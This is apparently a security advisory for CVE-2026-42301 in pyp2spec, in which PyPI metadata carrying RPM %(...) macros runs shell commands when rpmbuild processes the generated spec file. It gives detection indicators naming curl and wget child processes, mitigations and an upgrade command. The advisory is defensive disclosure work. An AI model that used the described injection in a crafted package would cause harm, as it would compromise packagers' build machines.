CVE-2026-42301 Overview
CVE-2026-42301 is an input validation vulnerability [CWE-20] in pyp2spec, a tool that generates Fedora RPM spec files from Python projects on the Python Package Index (PyPI). Versions prior to 0.14.1 write PyPI package metadata, such as the summary field, directly into the generated spec file without escaping RPM macro directives. When a packager runs rpmbuild against the generated spec, the embedded macros execute as part of the build process. A malicious PyPI package can therefore execute arbitrary commands on the packager's build machine. The issue is patched in pyp2spec version 0.14.1.
Critical Impact
A crafted PyPI package can achieve arbitrary command execution on a Fedora packager's build host once the generated spec file is processed by rpmbuild.
Affected Products
- pyp2spec versions prior to 0.14.1
- Fedora packaging workflows that consume pyp2spec-generated spec files
- Build hosts running rpmbuild against untrusted PyPI metadata
Discovery Timeline
- 2026-05-09 - CVE-2026-42301 published to the National Vulnerability Database (NVD)
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-42301
Vulnerability Analysis
pyp2spec automates the creation of RPM spec files for Python packages by pulling metadata directly from PyPI. The tool copies fields such as the project summary into spec file directives without sanitizing RPM macro syntax. RPM macros use the %{...} and %(...) constructs, where %(...) instructs rpmbuild to execute a shell command and inline its output. When a malicious package author embeds a macro expression into a metadata field, that expression is written verbatim into the spec file. The downstream packager then invokes rpmbuild, which evaluates the macros and runs the attacker's commands under the packager's account. This is a classic injection pattern where untrusted upstream data crosses into a code-evaluation context.
Root Cause
The root cause is missing output encoding when serializing PyPI metadata into RPM spec directives. pyp2spec treats PyPI fields as inert text, but rpmbuild interprets % sequences as macro expansions. Without escaping the % character or rejecting macro-bearing metadata, the tool allows attacker-controlled input to influence build-time execution.
Attack Vector
Exploitation requires user interaction from a Fedora packager. The attacker publishes a PyPI package whose metadata contains RPM macro directives, such as a summary value that includes %(...). The packager runs pyp2spec against the package to generate a spec file. When the packager subsequently executes rpmbuild on that spec, the embedded macro executes with the packager's privileges on the local build host. The CVSS vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H reflects this local, user-interaction-dependent path with full impact on confidentiality, integrity, and availability.
No verified exploit code is publicly available. Technical specifics are documented in the GitHub Security Advisory GHSA-r35x-v8p8-xvhw.
Detection Methods for CVE-2026-42301
Indicators of Compromise
- Generated .spec files containing unexpected %(...) shell-evaluation macros inside metadata fields such as Summary: or %description.
- rpmbuild invocations spawning unexpected child processes such as sh, curl, wget, or python during the spec parsing phase.
- Outbound network connections initiated from build hosts during what should be offline metadata processing.
Detection Strategies
- Statically scan pyp2spec-produced spec files for the %( sequence in metadata-derived fields before passing them to rpmbuild.
- Audit installed pyp2spec versions across packaging workstations and continuous integration runners and flag any version below 0.14.1.
- Correlate PyPI package ingestion events with subsequent process execution on build hosts to identify anomalous command chains.
Monitoring Recommendations
- Enable process-creation logging on packager workstations and CI builders to capture child processes of rpmbuild.
- Monitor egress traffic from build environments and alert on connections that do not match expected mirrors or package repositories.
- Track changes to the pyp2spec package version in build images and require version 0.14.1 or later as a baseline.
How to Mitigate CVE-2026-42301
Immediate Actions Required
- Upgrade pyp2spec to version 0.14.1 or later on every system that generates Fedora spec files.
- Review any spec files generated by vulnerable versions and inspect metadata fields for %(...) or other macro constructs before building.
- Rebuild and re-verify packages that were produced with vulnerable pyp2spec versions from untrusted PyPI sources.
Patch Information
The maintainer released the fix in pyp2spec v0.14.1, which escapes RPM macro directives in PyPI-sourced metadata. Coordinated disclosure details are available in the GitHub Security Advisory GHSA-r35x-v8p8-xvhw.
Workarounds
- Manually inspect generated spec files and remove or escape any % sequences originating from PyPI metadata before invoking rpmbuild.
- Run pyp2spec and rpmbuild inside an isolated, ephemeral build environment such as a container or mock chroot to contain potential command execution.
- Restrict packaging workflows to vetted PyPI packages until the upgrade to 0.14.1 is deployed across all build hosts.
# Upgrade pyp2spec to the patched release
pip install --upgrade 'pyp2spec>=0.14.1'
# Verify the installed version
pyp2spec --version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
